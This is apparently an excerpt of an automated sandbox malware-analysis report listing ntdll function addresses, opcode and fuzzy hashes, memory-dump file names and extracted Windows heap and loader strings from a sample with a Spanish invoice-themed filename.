                                  • Opcode ID: 4a7868f7e7942b06f2e629469080a935439ed4d7cfaddc962a8b8531faf48437
                                  • Instruction ID: 85ba3650ae1efd0f3aeba1a9e0480a9e6375d00a8b9461b68d3563c4791d226c
                                  • Opcode Fuzzy Hash: 4a7868f7e7942b06f2e629469080a935439ed4d7cfaddc962a8b8531faf48437
                                  • Instruction Fuzzy Hash: ABF1C3B5A402289BDB20DF18CC80BD9B7B5EF54364F5480E9EA08AB240EB759FC5CF55
                                  Function 324E1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                  Download Yara Rule
                                  Strings
                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 324E1728
                                  • HEAP[%wZ]: , xrefs: 324E1712
                                  • HEAP: , xrefs: 324E1596
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                  • API String ID: 0-3178619729
                                  • Opcode ID: 797ba230c142a596aafd46c5c69e28a14c0f705dc2849f3e77e42e48a3e4d34d
                                  • Instruction ID: c3f5a62b2f8ac844caaba2c6dab412952a04ee6d65f5ba4711ecac7ffc0628c0
                                  • Opcode Fuzzy Hash: 797ba230c142a596aafd46c5c69e28a14c0f705dc2849f3e77e42e48a3e4d34d
                                  • Instruction Fuzzy Hash: 19E1D074A047419BEB19CF28C491BBAFBF1AF48B05F14885EE99ACB345DB34E941CB50
                                  Function 324EBAA0 Relevance: 4.1, Strings: 3, Instructions: 361COMMON
                                  Download Yara Rule
                                  Strings
                                  • 'LDR: %s(), invalid image format of MUI file , xrefs: 32543AB4
                                  • {, xrefs: 32543ABD
                                  • LdrpLoadResourceFromAlternativeModule, xrefs: 32543AAF
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                  • API String ID: 0-1697150599
                                  • Opcode ID: e43afc8585bba7a9cb0f2c6cca1ccd746546a0e359e7b695ef523d6712aa8885
                                  • Instruction ID: 05bb99d247978352d6b71e5832fb1a0539f7de34e11c619958dac7b1094de623
                                  • Opcode Fuzzy Hash: e43afc8585bba7a9cb0f2c6cca1ccd746546a0e359e7b695ef523d6712aa8885
                                  • Instruction Fuzzy Hash: D6E16A746093859BF308CF14C590B6AB7E1BF84789F51892DF9869B360DB70DA46CB82
                                  Function 3256368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                  • API String ID: 0-2391371766
                                  • Opcode ID: 8189bb68d9de87c0a7cf787abbd670cddc47c8fd4419e8b309d352cd001fcc6a
                                  • Instruction ID: 0dd3acf2942308ef77f80ed00912814e46bc21f800ec97734d3bf24030bd2cc6
                                  • Opcode Fuzzy Hash: 8189bb68d9de87c0a7cf787abbd670cddc47c8fd4419e8b309d352cd001fcc6a
                                  • Instruction Fuzzy Hash: 1EB1E1B5605341BFE301DF54C880F6BBBE8EB54B68F405829FA40E7280DB71EA44CB92
                                  Function 32583B60 Relevance: 4.0, Strings: 3, Instructions: 280COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                  • API String ID: 0-1146358195
                                  • Opcode ID: a3ffb10d161ab9e9a0eb26c5c1a3238f1521034e0982285557eecb2c04959356
                                  • Instruction ID: 761de641f23dc1aa49eb25252a4d13bd0fac91c5d47bb4fde99bcd02258c2114
                                  • Opcode Fuzzy Hash: a3ffb10d161ab9e9a0eb26c5c1a3238f1521034e0982285557eecb2c04959356
                                  • Instruction Fuzzy Hash: 14A17D72609355AFD711DF24C880B5BBBE8FF98758F40092DB98897290DBB0DE05CB92
                                  Function 325736EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                  • API String ID: 0-318774311
                                  • Opcode ID: 1d3a9621f580bd7bf9884072dc3cfb82d7e951ce54ac314d9a2f5fed71cce93f
                                  • Instruction ID: eebc45473f010092e2bfe0831ce5c90b16e274fe05bf047a84eccc172a56d71f
                                  • Opcode Fuzzy Hash: 1d3a9621f580bd7bf9884072dc3cfb82d7e951ce54ac314d9a2f5fed71cce93f
                                  • Instruction Fuzzy Hash: 6D819BB5649341AFE311CF18C980B6ABBE8EF95764F40096DFD909B390EB74DA04CB52
                                  Function 32567410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                  • API String ID: 0-3870751728
                                  • Opcode ID: ebff3e425114b047c8fb50ae3da84fbdc42eafe42e179ddb760ef31502f5225c
                                  • Instruction ID: 8d01296d8e3d8d07a6249dd049cc846eb24dc5acdbcc0a78bd071fe585790219
                                  • Opcode Fuzzy Hash: ebff3e425114b047c8fb50ae3da84fbdc42eafe42e179ddb760ef31502f5225c
                                  • Instruction Fuzzy Hash: 2B916DB4E002159FEB14CF69C480BADBBF1FF88318F24916AD905AB391EB759A41CF54
                                  Function 3251909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %$&$@
                                  • API String ID: 0-1537733988
                                  • Opcode ID: 53fb052b6ed6e5cb289d312e9163659dec5bc4b38a007e18a3ef79966f9e879e
                                  • Instruction ID: 3b1d636523d9a96bae6b5b784698a964bce62e615bb777640d099d634c6530a1
                                  • Opcode Fuzzy Hash: 53fb052b6ed6e5cb289d312e9163659dec5bc4b38a007e18a3ef79966f9e879e
                                  • Instruction Fuzzy Hash: EA71C2745093419FEB08CF20C580A5BBBE5BFC4758F50491EE8A747290CB71EB45CB92
                                  Function 325BB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                  Download Yara Rule
                                  Strings
                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 325BB82A
                                  • TargetNtPath, xrefs: 325BB82F
                                  • GlobalizationUserSettings, xrefs: 325BB834
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                  • API String ID: 0-505981995
                                  • Opcode ID: 80b8fbca0b169abc0f8bee055df9dd138f8ac3c73bad3849869b27b670dddcbe
                                  • Instruction ID: f7c68078f9547620216e7b8c1cc06ff6f2779ea39429b34c048d026222d9558c
                                  • Opcode Fuzzy Hash: 80b8fbca0b169abc0f8bee055df9dd138f8ac3c73bad3849869b27b670dddcbe
                                  • Instruction Fuzzy Hash: A2618F72D41229ABDF21DF54DC88BDAB7B8AF48754F4101E9A908A7250DBB49F84CF90
                                  Function 324DF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3253E6C6
                                  • HEAP[%wZ]: , xrefs: 3253E6A6
                                  • HEAP: , xrefs: 3253E6B3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                  • API String ID: 0-1340214556
                                  • Opcode ID: e3ea98bb0e94ddb10674bfcaaa107161411c7f3b73e0d107fc68e3302897737a
                                  • Instruction ID: 31642b76e2eea80eb1d886ebeb049df4e3a0e18a819481860a53658af1063683
                                  • Opcode Fuzzy Hash: e3ea98bb0e94ddb10674bfcaaa107161411c7f3b73e0d107fc68e3302897737a
                                  • Instruction Fuzzy Hash: D851F575641784EFE712CBA4D864B9ABBF8FF05344F1500A4EA40CB693D774EA41CB51
                                  Function 325015F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrpCompleteMapModule, xrefs: 3254A590
                                  • minkernel\ntdll\ldrmap.c, xrefs: 3254A59A
                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 3254A589
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                  • API String ID: 0-1676968949
                                  • Opcode ID: 99d1ddd9b6d88c3d2af5886ab59b6bcd8d48c78aa785a4b909f44315a2c624cf
                                  • Instruction ID: d7d4087abcaf38ede43726c3400b95167f62f6325fdf399d535cfaf414efe070
                                  • Opcode Fuzzy Hash: 99d1ddd9b6d88c3d2af5886ab59b6bcd8d48c78aa785a4b909f44315a2c624cf
                                  • Instruction Fuzzy Hash: 1D5137796007409BFB11CBA8CE50B46BBE4EF40B58F548668F9519BAE1DF74EB40CB41
                                  Function 3258DAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                  Download Yara Rule
                                  Strings
                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3258DC32
                                  • HEAP[%wZ]: , xrefs: 3258DC12
                                  • HEAP: , xrefs: 3258DC1F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                  • API String ID: 0-3815128232
                                  • Opcode ID: a211354ebea305f93750ff5bc456b7d659a362e8d411452f9b95f83529837b5a
                                  • Instruction ID: b543cc31a1086030c435de040048b769ae057435fc2ab30f3ca224dcf9cb7e6b
                                  • Opcode Fuzzy Hash: a211354ebea305f93750ff5bc456b7d659a362e8d411452f9b95f83529837b5a
                                  • Instruction Fuzzy Hash: BB51037B3022508AF758CE39C440772B7E1EB4528AF508C9AE4C1CB281DAB5DA47DF21
                                  Function 324E1B04 Relevance: 3.9, Strings: 3, Instructions: 148COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 3253FB63
                                  • HEAP[%wZ]: , xrefs: 3253FB4B
                                  • HEAP: , xrefs: 3253FB58
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                  • API String ID: 0-1596344177
                                  • Opcode ID: 8bcf81f4e4c4870dc03d4b100a25dbcb045dd3547f1637e91995985de6690d64
                                  • Instruction ID: 1f2aaac2075fad5dafa366d65a054226889817b84a3e569345e8251d264914f6
                                  • Opcode Fuzzy Hash: 8bcf81f4e4c4870dc03d4b100a25dbcb045dd3547f1637e91995985de6690d64
                                  • Instruction Fuzzy Hash: 6B51AC74A00215DFEB08CF68C490BA9FBB1FF44715F558199D8599B242DB70ED42CB90
                                  Function 324D758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                  • API String ID: 0-1151232445
                                  • Opcode ID: 5065d1e68f79c85505a6f41944c334b2cf099fbe889572709bb658b2d149f4da
                                  • Instruction ID: 169a033e8ae564761d88ea1c2dcbb6e431d25329358760a2008f8100788e6109
                                  • Opcode Fuzzy Hash: 5065d1e68f79c85505a6f41944c334b2cf099fbe889572709bb658b2d149f4da
                                  • Instruction Fuzzy Hash: 0D4133BD2013808FFB1ACF18C1A07A97BE49F01798F5484A9DA85CB643EE74D9C6CB11
                                  Function 325116CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                  Download Yara Rule
                                  Strings
                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 32551B39
                                  • minkernel\ntdll\ldrtls.c, xrefs: 32551B4A
                                  • LdrpAllocateTls, xrefs: 32551B40
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                  • API String ID: 0-4274184382
                                  • Opcode ID: acfe8a282e73dd1b2f5a7ea925c97b3ea77d9e2410696e5250bf0fa62c7b984e
                                  • Instruction ID: f0dff0d0632782dae6fd9d6883dc73735e75dd11a23360f5ef70d3f8f253327c
                                  • Opcode Fuzzy Hash: acfe8a282e73dd1b2f5a7ea925c97b3ea77d9e2410696e5250bf0fa62c7b984e
                                  • Instruction Fuzzy Hash: 2B419DB5E01605AFEB05CFA8C840BADBBF1FF88705F508559E406A7310EB75AA41CFA0
                                  Function 32595180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-964947082
                                  • Opcode ID: 93525407c0a5552d1138c1f5d2e4e2de7c59ca7314914d87a4d406eb6ae11a64
                                  • Instruction ID: b940ef357c9062b53fab858fd105ce5b26f7e76fbe9c765f6fd9f2692d05f92c
                                  • Opcode Fuzzy Hash: 93525407c0a5552d1138c1f5d2e4e2de7c59ca7314914d87a4d406eb6ae11a64
                                  • Instruction Fuzzy Hash: CA41F5B5A02344AFDB10EF55D990FEA7BA8EF44304F50446AF901DB241CA70CB99CB50
                                  Function 325133A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlCreateActivationContext, xrefs: 325529F9
                                  • SXS: %s() passed the empty activation context data, xrefs: 325529FE
                                  • Actx , xrefs: 325133AC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                  • API String ID: 0-859632880
                                  • Opcode ID: 1337f0de5b7b9501b5e7e68ecb475835e8e0f408a15534eef144a316bab93a8f
                                  • Instruction ID: aeba2613b3b5199846081e09b72a7088a91568a245376e8db5139b829f640bbd
                                  • Opcode Fuzzy Hash: 1337f0de5b7b9501b5e7e68ecb475835e8e0f408a15534eef144a316bab93a8f
                                  • Instruction Fuzzy Hash: 8D312432600301AFFF16CF58D895B9A7BA4EB98714F51446AFD05DF241DBB1EA81CB90
                                  Function 3256B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                  Download Yara Rule
                                  Strings
                                  • GlobalFlag, xrefs: 3256B68F
                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3256B632
                                  • @, xrefs: 3256B670
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                  • API String ID: 0-4192008846
                                  • Opcode ID: 2b1b72c690b1dd0afeda88c8396f0d040650df328895566e6af82f4c53a689a1
                                  • Instruction ID: 9e928f4bb05a710f3a574047c26cc54aaa7b74ddd17fc9217ad5101614e6e6df
                                  • Opcode Fuzzy Hash: 2b1b72c690b1dd0afeda88c8396f0d040650df328895566e6af82f4c53a689a1
                                  • Instruction Fuzzy Hash: DC313CB5D00219AFEB00EFA4DD80AEEBBB8EF44748F501469E605F7190DB749B04CBA4
                                  Function 325813B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                  • API String ID: 0-1050206962
                                  • Opcode ID: d76383acfde7750cfb1e068852b42964db91cffa167affd91472ad36864f7533
                                  • Instruction ID: 0a81b62eece80056212402280994331f5f886c2ba5e8b0eda95fc2cf1ffb4be1
                                  • Opcode Fuzzy Hash: d76383acfde7750cfb1e068852b42964db91cffa167affd91472ad36864f7533
                                  • Instruction Fuzzy Hash: D5318E76D0021DBFEB01CF94CC84EAEBBBDEB44754F414465EA00B7260D7B59E048BA0
                                  Function 32511607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                  Download Yara Rule
                                  Strings
                                  • DLL "%wZ" has TLS information at %p, xrefs: 32551A40
                                  • minkernel\ntdll\ldrtls.c, xrefs: 32551A51
                                  • LdrpInitializeTls, xrefs: 32551A47
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                  • API String ID: 0-931879808
                                  • Opcode ID: 7e1f59dc8f6b1845648211eeea50f58b2572324fa1c83d85178041452eee0e57
                                  • Instruction ID: 4c935f7d2b25a0959ff8a7aa52034130c4644f217cc083d924fe66189884c80b
                                  • Opcode Fuzzy Hash: 7e1f59dc8f6b1845648211eeea50f58b2572324fa1c83d85178041452eee0e57
                                  • Instruction Fuzzy Hash: 33310731A40200FBFB148F58C984F9A7BB8AB40B55F548899F901F7590EB70BF41CBA0
                                  Function 324D74B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
